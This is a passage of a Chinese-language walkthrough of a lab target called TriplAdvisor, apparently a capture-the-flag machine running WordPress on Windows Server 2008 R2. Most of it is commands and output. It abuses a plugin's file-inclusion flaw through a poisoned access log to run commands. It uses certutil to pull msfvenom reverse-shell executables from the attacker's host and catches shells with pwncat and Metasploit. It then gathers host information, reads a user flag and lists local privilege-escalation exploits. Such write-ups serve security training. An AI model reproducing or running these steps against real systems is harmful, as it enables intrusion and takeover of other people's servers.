\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 504 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 736 "-" "curl\/8.8.0"\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 968 "-" "curl\/8.8.0"\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] "GET \/ HTTP\/1.1" 302 - "-" "curl\/8.10.1"\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1" 200 1288 "-" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] "GET \/wordpress\/ HTTP\/1.1" 200 22542 "-" " Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of C:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes\n\n06\/30\/2024 10:00 AM <DIR> .\n06\/30\/2024 10:00 AM <DIR> ..\n06\/30\/2024 10:00 AM 9,400 ajax_shortcode_pattern.php\n06\/30\/2024 10:00 AM 26,382 pagebuilder-options-manager.class.php\n06\/30\/2024 10:00 AM 68,418 pagebuilder.class.php\n06\/30\/2024 10:00 AM 5,561 pagebuildermodules.class.php\n06\/30\/2024 10:00 AM 34,306 pb-shortcodes.class.php\n06\/30\/2024 10:00 AM 16,293 pb-skin-loader.class.php\n 6 File(s) 160,360 bytes\n 2 Dir(s) 23,849,553,920 bytes free\n"\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] "POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1" 200 - "http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000" "WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress"\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u6210\u529frce\uff01<\/p>\n
RCE\u83b7\u53d6shell<\/h3>\n
\u5148\u751f\u6210\u4e00\u4e2a\u53cd\u5f39shell\u811a\u672c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom --payload windows\/x64\/shell_reverse_tcp LHOST=192.168.10.101 LPORT=1234 -f exe -o revshell.exe \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of exe file: 7168 bytes\nSaved as: revshell.exe<\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
# \u4e5f\u53ef\u4ee5\u4f7f\u7528 python3 -m http.server 8888\uff0c\u4f46\u662f\u5dee\u751f\u6587\u5177\u591a\u3002\u3002\u3002\u3002\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit<\/code><\/pre>\n\u4e0a\u4f20\u672c\u5730\u7684\u811a\u672c\uff0c\u76d1\u542c\u7136\u540e\u6fc0\u6d3b\u5373\u53ef\uff1a<\/p>\n
# \u8bbe\u7f6e\u76d1\u542c\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ sudo pwncat-cs -lp 1234 -m windows 2>\/dev\/null \n[02:34:30] Welcome to pwncat \ud83d\udc08!<\/code><\/pre>\n\u5c1d\u8bd5\u4e0b\u8f7d\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/revshell.exe+C:\\Windows\\Temp\\revshell.exe"\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1" 200 5728866 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 272 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 504 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 736 "-" "curl\/8.8.0"\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 968 "-" "curl\/8.8.0"\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] "GET \/ HTTP\/1.1" 302 - "-" "curl\/8.10.1"\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1" 200 1288 "-" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] "GET \/wordpress\/ HTTP\/1.1" 200 22542 "-" "**** Online ****\n 0000 ...\n 1c00\nCertUtil: -URLCache command completed successfully.\n"\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] "POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1" 200 - "http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000" "WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress"\n192.168.10.101 - - [04\/Jun\/2025:15:08:35 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=dir HTTP\/1.1" 200 2754 "-" "curl\/8.5.0"\n{"success":true,"data":{"output":[]}} <\/code><\/pre>\n\u53d1\u73b0\u5df2\u7ecf\u4e0b\u8f7d\u5230\u4e86\uff01<\/p>\n
<\/div><\/p>\n\u7136\u540e\u6fc0\u6d3b\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=C:\\Windows\\Temp\\revshell.exe<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6210\u529f\u5f39\u51fa\u6765\uff0c\u4e0d\u4f7f\u7528pwncat\u6362\u5176\u4ed6\u7684\u8bd5\u8bd5\u3002\u3002\u3002<\/p>\n
<\/div>
\n<\/div><\/p>\n\u6210\u529f\u5f39\u51fa\u6765\u4e86\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u9996\u5148\u5728\u684c\u9762\u627e\u5230\u4e86\u4e00\u4e2aflag\u3002\u3002<\/p>\n
c:\\Users\\websvc\\Desktop>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\websvc\\Desktop\n\n08\/15\/2024 09:02 PM <DIR> .\n08\/15\/2024 09:02 PM <DIR> ..\n06\/30\/2024 10:10 AM 33 user.txt\n 1 File(s) 33 bytes\n 2 Dir(s) 23,848,247,296 bytes free\n\nc:\\Users\\websvc\\Desktop>type user.txt\ntype user.txt\n4159a2b3a38697518722695cbb09ee46<\/code><\/pre>\n\u7136\u540e\u641c\u96c6\u4e00\u4e0b\u5176\u4ed6\u4fe1\u606f\uff1a<\/p>\n
c:\\Users\\websvc\\Desktop>whoami \/all\nwhoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name SID \n=================== ==============================================\ntripladvisor\\websvc S-1-5-21-2621822639-2474692399-1676906194-1003\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes \n==================================== ================ ============ ==================================================\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group\nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group\nMandatory Label\\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State \n============================= ========================================= ========\nSeChangeNotifyPrivilege Bypass traverse checking Enabled \nSeImpersonatePrivilege Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege Create global objects Enabled \nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\n\nc:\\Users\\websvc\\Desktop>ipconfig \/all\nipconfig \/all\n\nWindows IP Configuration\n\n Host Name . . . . . . . . . . . . : TriplAdvisor\n Primary Dns Suffix . . . . . . . : \n Node Type . . . . . . . . . . . . : Hybrid\n IP Routing Enabled. . . . . . . . : No\n WINS Proxy Enabled. . . . . . . . : No\n\nEthernet adapter Local Area Connection:\n\n Connection-specific DNS Suffix . : \n Description . . . . . . . . . . . : Intel(R) PRO\/1000 MT Desktop Adapter\n Physical Address. . . . . . . . . : 08-00-27-D3-33-DD\n DHCP Enabled. . . . . . . . . . . : Yes\n Autoconfiguration Enabled . . . . : Yes\n IPv6 Address. . . . . . . . . . . : fd00:4c10:d50a:f900::1002(Preferred) \n Lease Obtained. . . . . . . . . . : Wednesday, June 04, 2025 3:07:19 PM\n Lease Expires . . . . . . . . . . : Thursday, June 05, 2025 3:07:19 PM\n IPv6 Address. . . . . . . . . . . : fd00:4c10:d50a:f900:5479:dd94:1d27:478c(Deprecated) \n Link-local IPv6 Address . . . . . : fe80::5479:dd94:1d27:478c%3(Preferred) \n IPv4 Address. . . . . . . . . . . : 192.168.10.103(Preferred) \n Subnet Mask . . . . . . . . . . . : 255.255.255.0\n Lease Obtained. . . . . . . . . . : Wednesday, June 04, 2025 3:06:56 PM\n Lease Expires . . . . . . . . . . : Wednesday, June 04, 2025 5:06:56 PM\n Default Gateway . . . . . . . . . : fe80::4e10:d5ff:fe0a:f900%3\n 192.168.10.1\n DHCP Server . . . . . . . . . . . : 192.168.10.1\n DHCPv6 IAID . . . . . . . . . . . : 50855975\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2D-F5-24-BC-08-00-27-B4-04-E4\n DNS Servers . . . . . . . . . . . : fd00:4c10:d50a:f900:4e10:d5ff:fe0a:f900\n 192.168.1.1\n 192.168.10.1\n NetBIOS over Tcpip. . . . . . . . : Enabled\n\nc:\\Users\\websvc\\Desktop>systeminfo\nsysteminfo\n\nHost Name: TRIPLADVISOR\nOS Name: Microsoft Windows Server 2008 R2 Enterprise \nOS Version: 6.1.7600 N\/A Build 7600\nOS Manufacturer: Microsoft Corporation\nOS Configuration: Standalone Server\nOS Build Type: Multiprocessor Free\nRegistered Owner: Windows User\nRegistered Organization: \nProduct ID: 00486-109-0000007-84212\nOriginal Install Date: 6\/7\/2024, 1:24:47 PM\nSystem Boot Time: 6\/4\/2025, 3:06:38 PM\nSystem Manufacturer: innotek GmbH\nSystem Model: VirtualBox\nSystem Type: x64-based PC\nProcessor(s): 1 Processor(s) Installed.\n [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2578 Mhz\nBIOS Version: innotek GmbH VirtualBox, 12\/1\/2006\nWindows Directory: C:\\Windows\nSystem Directory: C:\\Windows\\system32\nBoot Device: \\Device\\HarddiskVolume1\nSystem Locale: en-us;English (United States)\nInput Locale: fr;French (France)\nTime Zone: (UTC-08:00) Pacific Time (US & Canada)\nTotal Physical Memory: 4,353 MB\nAvailable Physical Memory: 3,482 MB\nVirtual Memory: Max Size: 8,703 MB\nVirtual Memory: Available: 7,796 MB\nVirtual Memory: In Use: 907 MB\nPage File Location(s): C:\\pagefile.sys\nDomain: WORKGROUP\nLogon Server: N\/A\nHotfix(s): N\/A\nNetwork Card(s): 1 NIC(s) Installed.\n [01]: Intel(R) PRO\/1000 MT Desktop Adapter\n Connection Name: Local Area Connection\n DHCP Enabled: Yes\n DHCP Server: 192.168.10.1\n IP address(es)\n [01]: 192.168.10.103\n [02]: fe80::5479:dd94:1d27:478c\n [03]: fd00:4c10:d50a:f900:5479:dd94:1d27:478c\n [04]: fd00:4c10:d50a:f900::1002<\/code><\/pre>\n\u4e0d\u884c\u4e86\uff0cwindows\u4e0d\u592a\u4f1a\uff0c\u770b\u7684\u4e00\u5934\u96fe\u6c34\uff0c\u4e0amsf\u770b\u770b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ msfconsole -q\nmsf6 > use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) > set payload windows\/x64\/shell_reverse_tcp\npayload => windows\/x64\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) > set LHOST 192.168.10.101 \nLHOST => 192.168.10.101\nmsf6 exploit(multi\/handler) > set LPORT 1234\nLPORT => 1234\nmsf6 exploit(multi\/handler) > run\n\n[*] Started reverse TCP handler on 192.168.10.101:1234 \n[*] Command shell session 1 opened (192.168.10.101:1234 -> 192.168.10.103:49181) at 2025-06-04 03:11:07 -0400\n\nShell Banner:\nMicrosoft Windows [Version 6.1.7600]\n-----\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes><\/code><\/pre>\n\u4f7f\u7528\u76f8\u5173\u7684\u68c0\u67e5\u811a\u672c\uff0cctrl+Z\uff0c\u9009\u62e9 y\uff0c\u5219\u5c06\u5f53\u524dshell\u653e\u5230\u540e\u53f0\u3002<\/p>\n
c:\\Windows\\Temp>^Z\nBackground session 1? [y\/N] y\nmsf6 exploit(multi\/handler) > search local_exploit_suggest\n\nMatching Modules\n================\n\n # Name Disclosure Date Rank Check Description\n - ---- --------------- ---- ----- -----------\n 0 post\/multi\/recon\/local_exploit_suggester . normal No Multi Recon Local Exploit Suggester\n\nInteract with a module by name or index. For example info 0, use 0 or use post\/multi\/recon\/local_exploit_suggester\n\nmsf6 exploit(multi\/handler) > use 0\nmsf6 post(multi\/recon\/local_exploit_suggester) > sessions\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 shell x64\/windows Shell Banner: Microsoft Windows [Version 6.1.7600] ----- 192.168.10.101:1234 -> 192.168.10.103:49181 (192.168.10.103)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) > set session 1\nsession => 1\nmsf6 post(multi\/recon\/local_exploit_suggester) > run\n\n[*] 192.168.10.103 - Collecting local exploits for x64\/windows...\n[*] 192.168.10.103 - 196 exploit checks are being tried...\n[*] Running check method for exploit 1 \/ 1\n[*] 192.168.10.103 - Valid modules for session 1:\n============================\n\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit\/windows\/local\/win_error_cve_2023_36874 No The target is not exploitable.\n\n[*] Post module execution completed<\/code><\/pre>\n\u6ca1\u53d1\u73b0\u5565\u6f0f\u6d1e\u3002\u3002\u3002\u3002\u81ea\u6b64\u5c31\u9677\u5165\u957f\u65f6\u95f4\u7684\u50f5\u6301\u72b6\u6001\u4e86\uff0c\u7136\u540e\u770b\u5e08\u5085\u4eec\u7684wp\uff0c\u662f\u56e0\u4e3a\u8fd9\u4e2ashell\u529f\u80fd\u592a\u4f4e\uff0c\u9700\u8981\u5207\u6362\u81f3meterpreter\u8fdb\u884c\u641c\u96c6\u3002\u3002\u3002\u3002<\/p>\n
\u597d\uff0c\u91cd\u6765\u3002\u3002\u3002\u3002<\/p>\n
# kali1\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.10.101 LPORT=1234 -f exe -o pentest.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 510 bytes\nFinal size of exe file: 7168 bytes\nSaved as: pentest.exe\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 03:52:21] "GET \/pentest.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 03:52:21] "GET \/pentest.exe HTTP\/1.1" 200 -<\/code><\/pre>\n# kali2\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ msfconsole -q\nmsf6 > use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) > set payload windows\/x64\/meterpreter\/reverse_tcp\npayload => windows\/x64\/meterpreter\/reverse_tcp\nmsf6 exploit(multi\/handler) > options\n\nPayload options (windows\/x64\/meterpreter\/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST yes The listen address (an interface may be specified)\n LPORT 4444 yes The listen port\n\nExploit target:\n\n Id Name\n -- ----\n 0 Wildcard Target\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/handler) > set LPORT 1234\nLPORT => 1234\nmsf6 exploit(multi\/handler) > set LHOST 192.168.10.101\nLHOST => 192.168.10.101\nmsf6 exploit(multi\/handler) > run\n\n[*] Started reverse TCP handler on 192.168.10.101:1234 \n[*] Sending stage (201798 bytes) to 192.168.10.103\n[*] Meterpreter session 1 opened (192.168.10.101:1234 -> 192.168.10.103:49185) at 2025-06-04 03:52:57 -0400\n\nmeterpreter > ipconfig\n\nInterface 1\n============\nName : Software Loopback Interface 1\nHardware MAC : 00:00:00:00:00:00\nMTU : 4294967295\nIPv4 Address : 127.0.0.1\nIPv4 Netmask : 255.0.0.0\nIPv6 Address : ::1\nIPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\n\nInterface 3\n============\nName : Intel(R) PRO\/1000 MT Desktop Adapter\nHardware MAC : 08:00:27:d3:33:dd\nMTU : 1500\nIPv4 Address : 192.168.10.103\nIPv4 Netmask : 255.255.255.0\nIPv6 Address : fd00:4c10:d50a:f900::1002\nIPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\nIPv6 Address : fd00:4c10:d50a:f900:5479:dd94:1d27:478c\nIPv6 Netmask : ffff:ffff:ffff:ffff::\nIPv6 Address : fe80::5479:dd94:1d27:478c\nIPv6 Netmask : ffff:ffff:ffff:ffff::\n\nmeterpreter > getuid\nServer username: TRIPLADVISOR\\websvc\nmeterpreter > sysinfo\nComputer : TRIPLADVISOR\nOS : Windows Server 2008 R2 (6.1 Build 7600).\nArchitecture : x64\nSystem Language : en_US\nDomain : WORKGROUP\nLogged On Users : 1\nMeterpreter : x64\/windows\nmeterpreter > sessions -l\nUsage: sessions [options] or sessions [id]\n\nInteract with a different session ID.\n\nOPTIONS:\n\n -h, --help Show this message\n -i, --interact <id> Interact with a provided session ID\n\nmeterpreter > shell\nProcess 2348 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes>^Z\nBackground channel 1? [y\/N] y\n\nmeterpreter > background\n[*] Backgrounding session 1...\nmsf6 exploit(multi\/handler) > use post\/multi\/recon\/local_exploit_suggester\nmsf6 post(multi\/recon\/local_exploit_suggester) > sessions -l\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x64\/windows TRIPLADVISOR\\websvc @ TRIPLADVISOR 192.168.10.101:1234 -> 192.168.10.103:49185 (192.168.10.103)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) > set session 1\nsession => 1\nmsf6 post(multi\/recon\/local_exploit_suggester) > run\n\n[*] 192.168.10.103 - Collecting local exploits for x64\/windows...\n[*] 192.168.10.103 - 196 exploit checks are being tried...\n[+] 192.168.10.103 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2019_1458_wizardopium: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2021_40449: The service is running, but could not be validated. Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.103 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_075_reflection: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_075_reflection_juicy: The target appears to be vulnerable.\n[*] Running check method for exploit 45 \/ 45\n[*] 192.168.10.103 - Valid modules for session 1:\n============================\n\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit\/windows\/local\/bypassuac_eventvwr Yes The target appears to be vulnerable.\n 2 exploit\/windows\/local\/cve_2019_1458_wizardopium Yes The target appears to be vulnerable.\n 3 exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n 4 exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable.\n 5 exploit\/windows\/local\/cve_2021_40449 Yes The service is running, but could not be validated. Windows 7\/Windows Server 2008 R2 build detected!\n 6 exploit\/windows\/local\/ms14_058_track_popup_menu Yes The target appears to be vulnerable.\n 7 exploit\/windows\/local\/ms15_051_client_copy_image Yes The target appears to be vulnerable.\n 8 exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.\n 9 exploit\/windows\/local\/ms16_075_reflection Yes The target appears to be vulnerable.\n 10 exploit\/windows\/local\/ms16_075_reflection_juicy Yes The target appears to be vulnerable.\n 11 exploit\/windows\/local\/agnitum_outpost_acs No The target is not exploitable.\n 12 exploit\/windows\/local\/always_install_elevated No The target is not exploitable.\n 13 exploit\/windows\/local\/bits_ntlm_token_impersonation No The target is not exploitable.\n 14 exploit\/windows\/local\/bypassuac_dotnet_profiler No The target is not exploitable.\n 15 exploit\/windows\/local\/bypassuac_fodhelper No The target is not exploitable.\n 16 exploit\/windows\/local\/bypassuac_sdclt No The target is not exploitable.\n 17 exploit\/windows\/local\/bypassuac_sluihijack No The target is not exploitable.\n 18 exploit\/windows\/local\/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found\n 19 exploit\/windows\/local\/capcom_sys_exec No Cannot reliably check exploitability.\n 20 exploit\/windows\/local\/cve_2020_0796_smbghost No The target is not exploitable.\n 21 exploit\/windows\/local\/cve_2020_1048_printerdemon No The target is not exploitable.\n 22 exploit\/windows\/local\/cve_2020_1313_system_orchestrator No The target is not exploitable.\n 23 exploit\/windows\/local\/cve_2020_1337_printerdemon No The target is not exploitable.\n 24 exploit\/windows\/local\/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!\n 25 exploit\/windows\/local\/cve_2021_21551_dbutil_memmove No The target is not exploitable.\n 26 exploit\/windows\/local\/cve_2022_21882_win32k No The target is not exploitable.\n 27 exploit\/windows\/local\/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot. 28 exploit\/windows\/local\/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.\n 29 exploit\/windows\/local\/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2\n 30 exploit\/windows\/local\/cve_2023_28252_clfs_driver No The target is not exploitable. The target system does not have clfs.sys in system32\\drivers\\\n 31 exploit\/windows\/local\/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found\n 32 exploit\/windows\/local\/ikeext_service No The check raised an exception.\n 33 exploit\/windows\/local\/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store\n 34 exploit\/windows\/local\/ms10_092_schelevator No The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable\n 35 exploit\/windows\/local\/ms15_078_atmfd_bof No Cannot reliably check exploitability.\n 36 exploit\/windows\/local\/ms16_014_wmi_recv_notif No The target is not exploitable.\n 37 exploit\/windows\/local\/ntapphelpcachecontrol No The check raised an exception.\n 38 exploit\/windows\/local\/nvidia_nvsvc No The check raised an exception.\n 39 exploit\/windows\/local\/panda_psevents No The target is not exploitable.\n 40 exploit\/windows\/local\/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found\n 41 exploit\/windows\/local\/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.\n 42 exploit\/windows\/local\/tokenmagic No The target is not exploitable.\n 43 exploit\/windows\/local\/virtual_box_opengl_escape No The target is not exploitable.\n 44 exploit\/windows\/local\/webexec No The check raised an exception.\n 45 exploit\/windows\/local\/win_error_cve_2023_36874 No The target is not exploitable.\n\n[*] Post module execution completed<\/code><\/pre>\n# kali3\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/pentest.exe+C:\\Windows\\Temp\\pentest.exe"\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1" 200 5728866 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 272 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] "GET 